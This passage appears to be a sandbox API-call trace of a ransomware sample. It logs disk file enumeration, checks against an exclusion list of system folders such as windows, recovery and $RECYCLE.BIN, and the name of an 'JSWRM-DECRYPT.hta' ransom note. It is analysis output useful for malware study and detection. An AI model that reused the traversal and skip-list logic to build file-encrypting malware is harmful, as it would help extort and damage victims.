returned -1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0123.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0123.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0123.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0123.232] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59f29de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.232] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.232] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.232] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.232] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.232] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.232] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.232] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0123.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.233] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffddb96c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffddb96c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffddb96c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.233] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.234] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.234] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0123.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.235] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf8f7076d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf8f7076d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8e040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.235] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.235] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf8f7076d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf8f7076d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8e040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.235] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.236] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="mashupcompression.dll", cAlternateFileName="MASHUP~1.DLL")) returned 1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2=".") returned 1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="..") returned 1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="...") returned 1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="windows") returned -1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="recovery") returned -1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="perflogs") returned -1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="documents and settings") returned 1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="system volume information") returned -1 [0123.236] lstrcmpiW (lpString1="mashupcompression.dll", lpString2="msocache") returned -1 [0123.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mashupcompression.dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0123.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mashupcompression.dll", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mashupcompression.dll", lpUsedDefaultChar=0x0) returned 21 [0123.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mashupcompression.dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0123.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mashupcompression.dll", cchWideChar=21, lpMultiByteStr=0x2411c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mashupcompression.dll", lpUsedDefaultChar=0x0) returned 21 [0123.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.236] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa08b8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Data.Edm.NetFX35.dll", cAlternateFileName="MIE429~1.DLL")) returned 1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2=".") returned 1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="..") returned 1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="...") returned 1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="windows") returned -1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="recovery") returned -1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="perflogs") returned -1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="documents and settings") returned 1 [0123.236] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="system volume information") returned -1 [0123.237] lstrcmpiW (lpString1="Microsoft.Data.Edm.NetFX35.dll", lpString2="msocache") returned -1 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Edm.NetFX35.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0123.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Edm.NetFX35.dll", cchWideChar=30, lpMultiByteStr=0x2413a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Edm.NetFX35.dll", lpUsedDefaultChar=0x0) returned 30 [0123.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0123.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Edm.NetFX35.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0123.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Edm.NetFX35.dll", 